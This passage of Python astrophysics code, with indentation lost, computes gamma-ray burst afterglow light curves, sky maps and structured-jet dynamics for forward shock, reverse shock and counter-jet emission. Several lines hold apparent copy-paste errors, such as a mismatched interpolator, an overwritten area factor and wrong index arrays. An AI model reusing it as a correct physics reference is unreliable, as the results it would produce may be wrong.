seg_y = sin(pi-self.cthetas)*sin(self.cphis)
seg_z = cos(pi-self.cthetas)
#return arccos(u_obs_x*seg_x + u_obs_y*seg_y + u_obs_z*seg_z)
return u_obs_y*seg_y + u_obs_z*seg_z
def dopplerFactor(self, cosa, beta):
"""
Calculate the doppler factors of the different jethead segments
cosa -> cosine of observeration angle, obtained using obsangle
"""
return (1.-beta)/(1.-beta*cosa)
def light_curve_adiabatic(self, theta_obs, obsFreqs, tt0, ttf, num, Rb):
if type(obsFreqs)==float:
obsFreqs = array([obsFreqs])
calpha = self.obsangle(theta_obs)
alpha = arccos(calpha)
calpha_cj = self.obsangle_cj(theta_obs)
alpha_cj = arccos(calpha_cj)
if self.evolution == 'adiabatic':
max_Tobs = max(obsTime_offAxis_UR(self.RRs, self.TTs, self.Betas, max(alpha)))/cts.sTd
max_Tobs_cj = max(obsTime_offAxis_UR(self.RRs, self.TTs, self.Betas, max(alpha_cj)))/cts.sTd
elif self.evolution == 'peer':
max_Tobs = max(obsTime_offAxis_General(self.RRs, self.TTs, max(alpha)))/cts.sTd
max_Tobs_cj = max(obsTime_offAxis_General(self.RRs, self.TTs, max(alpha_cj)))/cts.sTd
if (ttf>max_Tobs or ttf>max_Tobs_cj):
print("ttf larger than maximum observable time. Adjusting value.")
ttf = min(max_Tobs, max_Tobs_cj)
lt0 = log10(tt0*cts.sTd) # Convert to seconds and then logspace
ltf = log10(ttf*cts.sTd) # Convert to seconds and then logspace
tts = logspace(lt0, ltf+(ltf-lt0)/num, num) # Timeline on which the flux is evaluated.
light_curve = zeros([len(obsFreqs), num])
light_curve_RS = zeros([len(obsFreqs), num])
light_curve_CJ = zeros([len(obsFreqs), num])
for ii in tqdm(range(self.ncells)):
#for ii in range(self.ncells):
onAxisTint = interp1d(self.RRs, self.TTs)
ttobs = obsTime_offAxis_UR(self.RRs, self.TTs, self.Betas, alpha[ii])
ttobs_cj = obsTime_offAxis_UR(self.RRs, self.TTs, self.Betas, alpha_cj[ii])
filTM = where(tts<=max(ttobs))[0]
filTm = where(tts[filTM]>=min(ttobs))[0]
filTM_cj = where(tts<=max(ttobs_cj))[0]
filTm_cj = where(tts[filTM_cj]>=min(ttobs_cj))[0]
Rint = interp1d(ttobs, self.RRs)
Robs = Rint(tts[filTM][filTm])
GamObs = self.GamInt(Robs)
BetaObs = sqrt(1.-GamObs**(-2.))
#if self.evolution == 'adiabatic':
# onAxisTobs = obsTime_onAxis_adiabatic(Robs, BetaObs)
#elif self.evolution == 'peer':
# onAxisTobs = obsTime_onAxis_integrated(Robs, GamObs, BetaObs)
onAxisTobs = onAxisTint(Robs)
# Forward shock stuff
Bfield = sqrt(32.*pi*self.nn*self.epB*cts.mp)*cts.cc*GamObs
gamMobs, nuMobs = minGam(GamObs, self.epE, self.epB, self.nn, self.pp, Bfield)
gamCobs, nuCobs = critGam(GamObs, self.epE, self.epB, self.nn, self.pp, Bfield, onAxisTobs)
Fnuobs = fluxMax(Robs, GamObs, self.nn, Bfield, self.DD)
# Reverse shock stuff
nuM_RS, nuC_RS, Fnu_RS = params_tt_RS(self, onAxisTobs, Rb)
# Counter-jet stuff
Rint_cj = interp1d(ttobs_cj, self.RRs)
Robs_cj = Rint_cj(tts[filTM_cj][filTm_cj])
GamObs_cj = self.GamInt(Robs_cj)
BetaObs_cj = sqrt(1.-GamObs_cj**(-2.))
#onAxisTint = interp1d(self.RRs, self.TTs)
#if self.evolution == 'adiabatic':
# onAxisTobs = obsTime_onAxis_adiabatic(Robs, BetaObs)
#elif self.evolution == 'peer':
# onAxisTobs = obsTime_onAxis_integrated(Robs, GamObs, BetaObs)
onAxisTobs_cj = onAxisTint(Robs_cj)
Bfield_cj = sqrt(32.*pi*self.nn*self.epB*cts.mp)*cts.cc*GamObs_cj
gamMobs_cj, nuMobs_cj = minGam(GamObs_cj, self.epE, self.epB, self.nn, self.pp, Bfield_cj)
gamCobs_cj, nuCobs_cj = critGam(GamObs_cj, self.epE, self.epB, self.nn, self.pp, Bfield_cj, onAxisTobs_cj)
Fnuobs_cj = fluxMax(Robs_cj, GamObs_cj, self.nn, Bfield_cj, self.DD)
dopFacs = self.dopplerFactor(calpha[ii], BetaObs)
afac = self.cellSize/maximum(self.cellSize*ones(num)[filTM][filTm], 2.*pi*(1.-cos(1./GamObs)))
dopFacs_cj = self.dopplerFactor(calpha_cj[ii], BetaObs_cj)
afac_cj = self.cellSize/maximum(self.cellSize*ones(num)[filTM_cj][filTm_cj], 2.*pi*(1.-cos(1./GamObs_cj)))
for freq in obsFreqs:
fil1, fil2 = where(gamMobs<=gamCobs)[0], where(gamMobs>gamCobs)[0]
fil3, fil4 = where(nuM_RS<=nuC_RS)[0], where(nuM_RS>nuC_RS)[0]
fil5, fil6 = where(nuMobs_cj<=nuCobs_cj)[0], where(nuMobs_cj>nuCobs_cj)[0]
freqs = freq/dopFacs # Calculate the rest-frame frequencies correspondng to the observed frequency
freqs_cj = freq/dopFacs_cj
light_curve[obsFreqs==freq, filTM[filTm][fil1]] = light_curve[obsFreqs==freq, filTM[filTm][fil1]] + (
afac[fil1] * dopFacs[fil1]**3. * FluxNuSC_arr(self, nuMobs[fil1], nuCobs[fil1], Fnuobs[fil1], freqs[fil1]))*calpha[ii]
#light_curve[obsFreqs==freq, filTM[filTm][fil2]] = light_curve[obsFreqs==freq, filTM[filTm][fil2]] + (
# afac[fil2] * dopFacs[fil2]**3. * FluxNuFC_arr(self, nuMobs[fil2], nuCobs[fil2], Fnuobs[fil2], freqs[fil2]))*calpha[ii]
light_curve_RS[obsFreqs==freq, filTM[filTm][fil3]] = light_curve_RS[obsFreqs==freq, filTM[filTm][fil3]] + (
afac[fil3] * dopFacs[fil3]**3. * FluxNuSC_arr(self, nuM_RS[fil3], nuC_RS[fil3], Fnu_RS[fil3], freqs[fil3]))*calpha[ii]
#light_curve_RS[obsFreqs==freq, filTM[filTm][fil4]] = light_curve_RS[obsFreqs==freq, filTM[filTm][fil4]] + (
# afac[fil4] * dopFacs[fil4]**3. * FluxNuFC_arr(self, nuM_RS[fil4], nuC_RS[fil4], Fnu_RS[fil4], freqs[fil4]))*calpha[ii]
light_curve_CJ[obsFreqs==freq, filTM_cj[filTm_cj][fil5]] = light_curve_CJ[obsFreqs==freq, filTM_cj[filTm_cj][fil5]] + (
afac_cj[fil5] * dopFacs_cj[fil5]**3. * FluxNuSC_arr(self, nuMobs_cj[fil5], nuCobs_cj[fil5], Fnuobs_cj[fil5], freqs_cj[fil5]))*calpha_cj[ii]
#return tts, 2.*light_curve, 2.*light_curve_RS
return tts, light_curve, light_curve_RS, light_curve_CJ
def light_curve_peer(self, theta_obs, obsFreqs, tt0, ttf, num, Rb):
if type(obsFreqs)==float:
obsFreqs = array([obsFreqs])
calpha = self.obsangle(theta_obs)
alpha = arccos(calpha)
calpha_cj = self.obsangle_cj(theta_obs)
alpha_cj = arccos(calpha_cj)
if self.evolution == 'adiabatic':
max_Tobs = max(obsTime_offAxis_UR(self.RRs, self.TTs, self.Betas, max(alpha)))/cts.sTd
max_Tobs_cj = max(obsTime_offAxis_UR(self.RRs, self.TTs, self.Betas, max(alpha_cj)))/cts.sTd
elif self.evolution == 'peer':
max_Tobs = max(obsTime_offAxis_General(self.RRs, self.TTs, max(alpha)))/cts.sTd
max_Tobs_cj = max(obsTime_offAxis_General(self.RRs, self.TTs, max(alpha_cj)))/cts.sTd
if (ttf>max_Tobs or ttf>max_Tobs_cj):
print("ttf larger than maximum observable time. Adjusting value. ")
ttf = min(max_Tobs, max_Tobs_cj)
lt0 = log10(tt0*cts.sTd) # Convert to seconds and then logspace
ltf = log10(ttf*cts.sTd) # Convert to seconds and then logspace
tts = logspace(lt0, ltf+(ltf-lt0)/num, num) # Timeline on which the flux is evaluated.
light_curve = zeros([len(obsFreqs), num])
light_curve_RS = zeros([len(obsFreqs), num])
light_curve_CJ = zeros([len(obsFreqs), num])
for ii in tqdm(range(self.ncells)):
#for ii in range(self.ncells):
onAxisTint = interp1d(self.RRs, self.TTs)
ttobs = obsTime_offAxis_General(self.RRs, self.TTs, alpha[ii])
ttobs_cj = obsTime_offAxis_General(self.RRs, self.TTs, alpha_cj[ii])
#ttobs = obsTime_offAxis_UR(self.RRs, self.TTs, self.Betas, alpha[ii])
filTM = where(tts<=max(ttobs))[0]
filTm = where(tts[filTM]>=min(ttobs))[0]
filTM_cj = where(tts<=max(ttobs))[0]
filTm_cj = where(tts[filTM_cj]>=min(ttobs))[0]
#print(len(tts[filT]))
Rint = interp1d(ttobs, self.RRs)
Robs = Rint(tts[filTM][filTm])
GamObs = self.GamInt(Robs)
BetaObs = sqrt(1.-GamObs**(-2.))
#if self.evolution == 'adiabatic':
# onAxisTobs = obsTime_onAxis_adiabatic(Robs, BetaObs)
#elif self.evolution == 'peer':
# onAxisTobs = obsTime_onAxis_integrated(Robs, GamObs, BetaObs)
onAxisTobs = onAxisTint(Robs)
Rint_cj = interp1d(ttobs_cj, self.RRs)
Robs_cj= Rint(tts[filTM_cj][filTm_cj])
GamObs_cj = self.GamInt(Robs_cj)
BetaObs_cj = sqrt(1.-GamObs_cj**(-2.))
onAxisTobs_cj = onAxisTint(Robs_cj)
# Forward shock stuff
#gamMobs, gamCobs = self.gamMI(Robs), self.gamCI(Robs)
#nuMobs, nuCobs = self.nuMI(Robs), self.nuCI(Robs)
#Fnuobs = self.FnuMI(Robs)
#Bfield = sqrt(32.*pi*cts.mp*self.nn*self.epB*GamObs*(GamObs-1.))*cts.cc
Bfield = Bfield_modified(GamObs, BetaObs, self.nn, self.epB)
gamMobs, nuMobs = minGam_modified(GamObs, self.epE, self.epB, self.nn, self.pp, Bfield, self.Xp)
gamCobs, nuCobs = critGam_modified(GamObs, self.epE, self.epB, self.nn, self.pp, Bfield, onAxisTobs)
Fnuobs = fluxMax_modified(Robs, GamObs, self.nn, Bfield, self.DD, self.PhiP)
Bfield_cj = Bfield_modified(GamObs_cj, BetaObs_cj, self.nn, self.epB)
gamMobs_cj, nuMobs_cj = minGam_modified(GamObs_cj, self.epE, self.epB, self.nn, self.pp, Bfield_cj, self.Xp)
gamCobs_cj, nuCobs_cj = critGam_modified(GamObs_cj, self.epE, self.epB, self.nn, self.pp, Bfield_cj, onAxisTobs_cj)
Fnuobs_cj = fluxMax_modified(Robs_cj, GamObs_cj, self.nn, Bfield_cj, self.DD, self.PhiP)
# Reverse shock stuff
nuM_RS, nuC_RS, Fnu_RS = params_tt_RS(self, onAxisTobs, Rb)
dopFacs = self.dopplerFactor(calpha[ii], BetaObs)
afac = self.cellSize/maximum(self.cellSize*ones(num)[filTM][filTm], 2.*pi*(1.-cos(1./GamObs)))
dopFacs_cj = self.dopplerFactor(calpha_cj[ii], BetaObs_cj)
afac = self.cellSize/maximum(self.cellSize*ones(num)[filTM_cj][filTm_cj], 2.*pi*(1.-cos(1./GamObs_cj)))
for freq in obsFreqs:
fil1, fil2 = where(gamMobs<=gamCobs)[0], where(gamMobs>gamCobs)[0]
fil3, fil4 = where(nuM_RS<=nuC_RS)[0], where(nuM_RS>nuC_RS)[0]
fil5, fil6 = where(nuMobs_cj<=nuCobs_cj)[0], where(nuMobs_cj>nuCobs_cj)[0]
freqs = freq/dopFacs # Calculate the rest-frame frequencies correspondng to the observed frequency
freqs_cj = freq/dopFacs_cj
light_curve[obsFreqs==freq, filTM[filTm][fil1]] = light_curve[obsFreqs==freq, filTM[filTm][fil1]] + (
self.cellSize * (GamObs[fil1]*(1.-BetaObs[fil1]*calpha[ii]))**(-3.) * FluxNuSC_arr(self, nuMobs[fil1], nuCobs[fil1], Fnuobs[fil1], freqs[fil1]))#*calpha[ii]
#light_curve[obsFreqs==freq, filTM[filTm][fil2]] = light_curve[obsFreqs==freq, filTM[filTm][fil2]] + (
# afac[fil2] * dopFacs[fil2]**3. * FluxNuFC_arr(self, nuMobs[fil2], nuCobs[fil2], Fnuobs[fil2], freqs[fil2]))*calpha[ii]
light_curve_RS[obsFreqs==freq, filTM[filTm][fil3]] = light_curve_RS[obsFreqs==freq, filTM[filTm][fil3]] + (
self.cellSize * (GamObs[fil3]*(1.-BetaObs[fil3]*calpha[ii]))**(-3.) * FluxNuSC_arr(self, nuM_RS[fil3], nuC_RS[fil3], Fnu_RS[fil3], freqs[fil3]))#*calpha[ii]
#light_curve_RS[obsFreqs==freq, filTM[filTm][fil4]] = light_curve_RS[obsFreqs==freq, filTM[filTm][fil4]] + (
# afac[fil4] * dopFacs[fil4]**3. * FluxNuFC_arr(self, nuM_RS[fil4], nuC_RS[fil4], Fnu_RS[fil4], freqs[fil4]))*calpha[ii]
light_curve_CJ[obsFreqs==freq, filTM_cj[filTm_cj][fil5]] = light_curve_CJ[obsFreqs==freq, filTM_cj[filTm_cj][fil5]] + (
self.cellSize * (GamObs_cj[fil5]*(1.-BetaObs_cj[fil5]*calpha_cj[ii]))**(-3.) * FluxNuSC_arr(self, nuMobs_cj[fil5], nuCobs_cj[fil5], Fnuobs_cj[fil5], freqs_cj[fil3]))#*calpha[ii]
#return tts, 2.*light_curve, 2.*light_curve_RS
return tts, light_curve, light_curve_RS, light_curve_CJ
def lightCurve_interp(self, theta_obs, obsFreqs, tt0, ttf, num, Rb):
if self.evolution == "adiabatic":
tts, light_curve, light_curve_RS, light_curve_CJ = self.light_curve_adiabatic(theta_obs, obsFreqs, tt0, ttf, num, Rb)
elif self.evolution == "peer":
tts, light_curve, light_curve_RS,light_curve_CJ = self.light_curve_peer(theta_obs, obsFreqs, tt0, ttf, num, Rb)
return tts, light_curve, light_curve_RS, light_curve_CJ
def skymap(self, theta_obs, tt_obs, freq, nx, ny, xx0, yy0):
calpha = zeros([2*self.ncells])
alpha = zeros([2*self.ncells])
calpha[:self.ncells] = self.obsangle(theta_obs)
calpha[self.ncells:] = self.obsangle_cj(theta_obs)
alpha = arccos(calpha)
TTs, RRs, Gams, Betas = zeros(2*self.ncells), zeros(2*self.ncells), zeros(2*self.ncells), zeros(2*self.ncells)
#nuMs, nuCs, fluxes = zeros(2.*self.ncells), zeros(2.*self.ncells), zeros(2.*self.ncells)
fluxes = zeros(2*self.ncells)
im_xxs, im_yys = zeros(2*self.ncells), zeros(2*self.ncells)
im_xxs[:self.ncells] = -1.*cos(theta_obs)*sin(self.cthetas)*sin(self.cphis) + sin(theta_obs)*cos(self.cthetas)
im_yys[:self.ncells] = sin(self.cthetas)*cos(self.cphis)
im_xxs[self.ncells:] = -1.*cos(theta_obs)*sin(pi-self.cthetas)*sin(self.cphis) + sin(theta_obs)*cos(pi-self.cthetas)
im_yys[self.ncells:] = sin(pi-self.cthetas)*cos(self.cphis)
indices = where(im_yys>0)
if self.evolution == 'adiabatic':
Tint = interp1d(self.RRs, self.TTs)
for ii in tqdm(indices):#tqdm(range(self.ncells)):
ttobs = obsTime_offAxis_UR(self.RRs, self.TTs, self.Betas, alpha[ii])
ttobs_cj = obsTime_offAxis_UR(self.RRs, self.TTs, self.Betas, alpha[ii+self.ncells])
Rint = interp1d(ttobs, self.RRs)
Rint_cj = interp1d(ttobs_cj, self.RRs)
RRs[ii] = Rint(tt_obs)
RRs[ii+self.ncells] = Rint_cj(tt_obs)
TTs[ii], TTs[ii+self.ncells] = Tint(RRs[ii]), Tint(RRs[ii+self.ncells])
Gams[ii], Gams[ii+self.ncells] = self.GamInt(RRs[ii]), self.GamInt(RRs[ii+self.ncells])
Betas = sqrt(1.-Gams**(-2.))
Bf = (32.*pi*self.nn*self.epB*cts.mp)**(1./2.) * Gams*cts.cc
gamM, nuM = minGam(Gams, self.epE, self.epB, self.nn, self.pp, Bf)
gamC, nuC = critGam(Gams, self.epE, self.epB, self.nn, self.pp, Bf, TTs)
fMax = fluxMax(RRs, Gams, self.nn, Bf, self.DD)
dopFacs = self.dopplerFactor(calpha, sqrt(1.-Gams**(-2)))
afac = self.cellSize/maximum(self.cellSize*ones(len(Gams)), 2.*pi*(1.-cos(1./Gams)))
obsFreqs = freq/dopFacs
fluxes = (self.DD**2./(calpha*self.cellSize*RRs**2.)) *afac * dopFacs**3. * FluxNuSC_arr(self, nuM, nuC, fMax, obsFreqs)*1./calpha
#fluxes = afac * dopFacs**3. * FluxNuSC_arr(self, nuM, nuC, fMax, obsFreqs)*calpha
elif self.evolution == 'peer':
Tint = interp1d(self.RRs, self.TTs)
for ii in tqdm(range(self.ncells)):
ttobs = obsTime_offAxis_General(self.RRs, self.TTs, alpha[ii])
ttobs_cj = obsTime_offAxis_General(self.RRs, self.TTs, alpha[ii+self.ncells])
Rint, Rint_cj = interp1d(ttobs, self.RRs), interp1d(ttobs_cj, self.RRs)
RRs[ii], RRs[ii+self.ncells] = Rint(tt_obs), Rint_cj(tt_obs)
TTs[ii], TTs[ii+self.ncells] = Tint(RRs[ii]), Tint(RRs[ii+self.ncells])
Gams[ii], Gams[ii+self.ncells] = self.GamInt(RRs[ii]), self.GamInt(RRs[ii+self.ncells])
Betas = sqrt(1.-Gams**(-2.))
Bf = Bfield_modified(Gams, Betas, self.nn, self.epB)
gamM, nuM = minGam_modified(Gams, self.epE, self.epB, self.nn, self.pp, Bf, self.Xp)
gamC, nuC = critGam_modified(Gams, self.epE, self.epB, self.nn, self.pp, Bf, TTs)
fMax = fluxMax_modified(RRs, Gams, self.nn, Bf, self.DD, self.PhiP)
dopFacs = self.dopplerFactor(calpha, sqrt(1.-Gams**(-2)))
obsFreqs = freq/dopFacs
#fluxes = (self.DD/self.cellSize*RRs)**2. * self.cellSize * (Gams*(1.-Betas*calpha))**(-3.) * FluxNuSC_arr(self, nuM, nuC, fMax, obsFreqs)*1./calpha
fluxes = (self.DD**2./(calpha*self.cellSize*RRs**2.)) * self.cellSize * (Gams*(1.-Betas*calpha))**(-3.) * FluxNuSC_arr(self, nuM, nuC, fMax, obsFreqs)
#fluxes = self.cellSize * (Gams*(1.-Betas*calpha))**(-3.) * FluxNuSC_arr(self, nuM, nuC, fMax, obsFreqs)#*calpha
im_xxs = RRs*im_xxs
im_yys = RRs*im_yys
return im_xxs, im_yys, fluxes, RRs, Gams, calpha, TTs
class jetHeadGauss(jetHeadUD):
def __init__(self, EE, Gam0, nn, epE, epB, pp, DD, steps, evolution, nlayers, joAngle, coAngle, shell_type='thin', Rb=1.):
# In this case, EE refers to the total energy and Gam0 to the central Gam0 value
self.coAngle = coAngle
jetHeadUD.__init__(self, EE, Gam0, nn, epE, epB, pp, DD, steps, evolution, nlayers, joAngle, shell_type, Rb)
self.__energies_and_LF()
if self.evolution == 'adiabatic':
self.cell_Rds = (3./(4.*pi) * 1./(cts.cc**2.*cts.mp) *
self.cell_EEs/(self.nn*self.cell_Gam0s**2.))**(1./3.)
self.cell_Tds = self.cell_Rds/(cts.cc*self.cell_Beta0s) * (1.-self.cell_Beta0s)
#self.cell_Tds = self.cell_Rds/(2.*cts.cc*self.cell_Gam0s**2.)
#self.Rd/(2.*self.Gam0**2 * cts.cc)
elif self.evolution == 'peer':
self.cell_Rds = (3./(4.*pi) * 1./(cts.cc**2.*cts.mp) *
self.cell_EEs/(self.nn*self.cell_Gam0s**2.))**(1./3.)
self.cell_Tds = self.cell_Rds/(cts.cc*self.cell_Beta0s) * (1.-self.cell_Beta0s)
print("Calculating dynamical evolution")
self.__evolve()
print("Calculating reverse shock parmeters")
self.__peakParamsRS_struc()
def __energies_and_LF(self):
#AngFacs = exp(-1.*self.cthetas**2./(2.*self.coAngle**2.))
self.cell_EEs = self.EE * exp(-1.*self.cthetas**2./(self.coAngle**2.)) # Just for texting
#self.cell_EEs = self.EE * exp(-1.*self.cthetas**2./(self.coAngle**2.))
self.cell_Gam0s = 1.+(self.Gam0-1)*exp(-1.*self.cthetas**2./(2.*self.coAngle**2.))
self.cell_Beta0s = sqrt(1.-(self.cell_Gam0s)**(-2.))
def __evolve(self):
if self.evolution == 'peer':
self.RRs, self.Gams, self.Betas = self.evolve_relad_struct()
self.TTs = self.obsTime_onAxis_struct()
self.Bfield = Bfield_modified(self.Gams, self.Betas, self.nn, self.epB)
elif self.evolution == 'adiabatic':
self.RRs, self.Gams, self.Betas = self.evolve_ad_struct()
self.TTs = self.obsTime_onAxis_struct()
self.Bfield = (32.*pi*cts.mp*self.epB*self.nn)**(1./2.)*self.Gams*cts.cc
def __peakParamsRS_struc(self):
RSpeak_nuM_struc = zeros(self.ncells)
RSpeak_nuC_struc = zeros(self.ncells)
RSpeak_Fnu_struc = zeros(self.ncells)
if self.shell_type=='thin':
print("Setting up thin shell")
for ii in tqdm(range(self.ncells)):
#self.RSpeak_nuM = 9.6e14 * epE**2. * epB**(1./2.) * nn**(1./2) * Gam0**2.
#self.RSpeak_nuC = 4.0e16 * epB**(-3./2.) * EE**(-2./3.) * nn**(-5./6.) * Gam0**(4./3.)
#self.RSpeak_Fnu = 5.2 * DD**(-2.) * epB**(1./2.) * EE * nn**(1./2.) * Gam0
Rd, Td = self.cell_Rds[ii], self.cell_Tds[ii]
#print Rd
if self.evolution == 'peer':
#print shape(self.RRs), shape(self.Gams)
GamsInt = interp1d(self.RRs[:], self.Gams[:,ii])
Gam0 = GamsInt(Rd)
Beta0 = sqrt(1.-Gam0**(-2.))
Bf = Bfield_modified(Gam0, Beta0, self.nn, self.epB)
gamM, nuM = minGam_modified(Gam0, self.epE, self.epB, self.nn, self.pp, Bf, self.Xp)
gamC, nuC = critGam_modified(Gam0, self.epE, self.epB, self.nn, self.pp, Bf, Td)
Fnu = fluxMax_modified(Rd, Gam0, self.nn, Bf, self.DD, self.PhiP)
elif self.evolution == 'adiabatic':
GamsInt = interp1d(self.RRs[:,ii], self.Gams[:,ii])
Gam0 = GamsInt(Rd)
Bf = (32.*pi*cts.mp*self.epB*self.nn)**(1./2.)*Gam0*cts.cc
gamM, nuM = minGam(Gam0, self.epE, self.epB, self.nn, self.pp, Bf)
gamC, nuC = critGam(Gam0, self.epE, self.epB, self.nn, self.pp, Bf, Td)
Fnu = fluxMax(Rd, Gam0, self.nn, Bf, self.DD)
#print Rd, max(self.RRs[:,ii]), min(self.RRs[:,ii]), self.cell_Gam0s[ii], self.cthetas[ii]
#gamM = self.epE*(self.pp-2.)/(self.pp-1.) * cts.mp/cts.me * Gam0
#gamC = 3.*cts.me/(16.*self.epB*cts.sigT*cts.mp*cts.cc*Gam0**3.*Td*self.nn)
#nuM = Gam0*gamM**2.*cts.qe*(32.*pi*cts.mp*self.epB*self.nn)**(1./2.)*Gam0*cts.cc/(2.*pi*cts.me*cts.cc)
#nuC = Gam0*gamC**2.*cts.qe*(32.*pi*cts.mp*self.epB*self.nn)**(1./2.)*Gam0*cts.cc/(2.*pi*cts.me*cts.cc)
#Fnu = self.nn**(3./2.)*Rd**3. * cts.sigT * cts.cc**3. *cts.me* (32.*pi*cts.mp*self.epB
# )**(1./2.)*Gam0**2./(9.*cts.qe*self.DD**2.)
#RSpeak_nuM_struc[ii] = nuM/(self.cell_Gam0s[ii]**2.)
#RSpeak_nuC_struc[ii] = nuC
#RSpeak_Fnu_struc[ii] = self.cell_Gam0s[ii] * Fnu
RSpeak_nuM_struc[ii] = nuM/(Gam0**2)
RSpeak_nuC_struc[ii] = nuC
RSpeak_Fnu_struc[ii] = Gam0*Fnu
self.RSpeak_nuM_struc = RSpeak_nuM_struc #self.Rb**(1./2.)*RSpeak_nuM_struc
self.RSpeak_nuC_struc = RSpeak_nuC_struc #self.Rb**(-3./2.)*RSpeak_nuC_struc
self.RSpeak_Fnu_struc = RSpeak_Fnu_struc #self.Rb**(1./2.)*RSpeak_Fnu_struc
def evolve_relad_struct(self):
"""
Evolution following Pe'er 2012. Adbaiatic expansion into a cold, uniform ISM using conservation of energy in relativstic form. This solution
transitions smoothly from the ultra-relativistic to the Newtonian regime. Modified for stuctured jet
"""
Gam0 = self.Gam0
Rl = self.Rd * Gam0**(2./3.)
RRs = logspace(log10(self.Rd/1000.), log10(Rl)+3., self.steps+1) #10
#MMs = 4.*pi * cts.mp*self.nn*RRs**3./3.#4./3. *pi*cts.mp*self.nn*RRs**3.
MMs = 4./3. * pi*RRs**3. * self.nn * cts.mp
#Gams[0,:] = self.cell_Gam0s
#print("Calculating Gamma as a function of R for each cell")
print("Calculating dynamical evolution for each layer")
#for ii in tqdm(range(1,len(self.Betas))):
# Gams[ii,:] = rk4(dgdm_struc, self, log10(MMs[ii-1]), Gams[ii-1,:], (log10(MMs[ii])-log10(MMs[ii-1])))
for ii in tqdm(range(self.nlayers)):
# Set up initial conditions for the layer
#GamEv[0] = Gams[0,self.layer==ii+1][0]
MM0 = self.cell_EEs[self.layer==ii+1][0]/(self.cell_Gam0s[self.layer==ii+1][0]*cts.cc**2.)
self.cell_Gam0s[self.layer==ii+1][0]
#Gams = zeros(len(RRs))
GamEv = zeros([len(RRs)])
GamEv[0] = self.cell_Gam0s[self.layer==ii+1][0]
# Calculate dynamical evolution of the layer
for jj in range(1, len(GamEv)):
GamEv[jj] = rk4(dgdm_mod, MM0, log10(MMs[jj-1]), GamEv[jj-1], (log10(MMs[jj])-log10(MMs[jj-1])))
# Share the values with the rest of the cells of the layer
if ii==0:
Gams = array([GamEv,]).T
else:
GamEv = array([GamEv]*self.cellsInLayer(ii)).T
#Gams = column_stack((Gams, GamEv))
Gams = concatenate([Gams, GamEv], axis=1)
Betas = sqrt(1.-1./Gams**2.)
#Betas[-1] = 0.0
#print(shape(Gams))
return RRs, Gams, Betas
def evolve_ad_struct(self):
"""
Evolution following simple energy conservation for an adiabatically expanding relativistic shell. Same scaling as
Blanford-Mckee blastwave solution. This calculation is only valid in ultrarelativstic phase.
"""
Gam = self.Gam0
GamSD = 1.021
Rsd = Gam**(2./3.) *self.Rd / GamSD # Radius at Lorentz factor=1.005 -> after this point use Sedov-Taylor scaling
Rl = self.Rd * self.Gam0**(2./3.)
#RRs = logspace(log10(self.Rd/100.), log10(Rl), self.steps+1) #10
RRs = zeros([self.steps+1, self.ncells])
Gams = zeros([self.steps+1, self.ncells])
Betas = zeros([self.steps+1, self.ncells])
Gams[0,:] = self.cell_Gam0s
for ii in range(self.ncells):
RRs[:,ii] = logspace(log10(self.cell_Rds[ii]/100.), log10(0.9999*self.cell_Rds[ii] * self.cell_Gam0s[ii]**(2./3.)), self.steps+1) # All start at same point
Gams[RRs[:,ii]<=self.cell_Rds[ii],ii] = self.cell_Gam0s[ii]
Gams[RRs[:,ii]>self.cell_Rds[ii], ii] = (self.cell_Rds[ii]/RRs[RRs[:,ii]>self.cell_Rds[ii],ii])**(3./2.) * self.cell_Gam0s[ii]
#Gams[RRs>=Rsd] = 1./sqrt( 1.-(Rsd/RRs[RRs>=Rsd])**(6.)*(1.-1./(Gams[(RRs>jet.Rd) & (RRs<Rsd)][-1]**2.)))
#Gams[RRs>=jet.Rd] = odeint(jet.dgdr, jet.Gam0, RRs[RRs>=jet.Rd])[:,0]
#Gams[RRs>=jet.Rd] = odeint(jet.dgdr, jet.Gam0, RRs[RRs>=jet.Rd])[:,0]
Betas[RRs[:,ii]<=self.cell_Rds[ii],ii] = sqrt(1.-(1./self.cell_Gam0s[ii])**2.)
Betas[RRs[:,ii]>self.cell_Rds[ii], ii] = sqrt(1.-(1./Gams[RRs[:,ii]>self.cell_Rds[ii], ii])**2.)
Betas[-1,:] = 0.
#Gams[Gams<=1.] = 1.
return RRs, Gams, Betas
def obsTime_onAxis_struct(self):
"""
On-axis observer times calculated for each individual cell
"""
print("Calculating on-axis observerd time for each cell")
#for ii in tqdm(range(1,len(self.Betas))):
if self.evolution == "adiabatic":
for layer in range(self.nlayers):
if layer==0:
TTs = obsTime_onAxis_adiabatic(self.RRs[:, layer],self.Betas[:, layer])
else:
layerTime = obsTime_onAxis_adiabatic(self.RRs[:, self.layer==layer+1][:,0], self.Betas[:, self.layer==layer+1][:,0])
for cell in range(self.cellsInLayer(layer)):
TTs = column_stack((TTs, layerTime))
elif self.evolution == "peer":
for layer in tqdm(range(self.nlayers)):
if layer==0:
TTs = obsTime_onAxis_integrated(self.RRs, self.Gams[:, layer], self.Betas[:, layer])
TTs = array([TTs,]).T
else:
layerTime = obsTime_onAxis_integrated(self.RRs, self.Gams[:, self.layer==layer+1][:,0],
self.Betas[:, self.layer==layer+1][:,0])
#TTs = column_stack((TTs, layerTime))
layerTime = array([layerTime]*self.cellsInLayer(layer)).T
TTs = concatenate([TTs, layerTime], axis=1)
return TTs
def params_tt_RS(self, tt, ii, Rb):
if type(tt) == 'float': tt = array([tt])
fil1, fil2 = where(tt<=self.cell_Tds[ii])[0], where(tt>self.cell_Tds[ii])[0]
#print ii, len(tt)
nuM = zeros(len(tt))
nuC = zeros(len(tt))
fluxMax = zeros(len(tt))
#print len(nuM), len(nuC), len()
nuM[fil1] = self.RSpeak_nuM_struc[ii]*(tt[fil1]/self.cell_Tds[ii])**(6.)
nuC[fil1] = self.RSpeak_nuC_struc[ii]*(tt[fil1]/self.cell_Tds[ii])**(-2.)
fluxMax[fil1] = self.RSpeak_Fnu_struc[ii]*(tt[fil1]/self.cell_Tds[ii])**(3./2.) # Returns fluxes in Jy
nuM[fil2] = self.RSpeak_nuM_struc[ii]*(tt[fil2]/self.cell_Tds[ii])**(-54./35.)
nuC[fil2] = self.RSpeak_nuC_struc[ii]*(tt[fil2]/self.cell_Tds[ii])**(4./35.)
fluxMax[fil2] = self.RSpeak_Fnu_struc[ii]*(tt[fil2]/self.cell_Tds[ii])**(-34./35.) # Returns fluxes in Jy
return Rb**(1./2.)*nuM, Rb**(-3./2.)*nuC, Rb**(1./2.)*fluxMax
def light_curve_adiabatic(self, theta_obs, obsFreqs, tt0, ttf, num, Rb):
if type(obsFreqs)==float:
obsFreqs = array([obsFreqs])
calpha = self.obsangle(theta_obs)
alpha = arccos(calpha)
# Obserer angle for the counter-jet
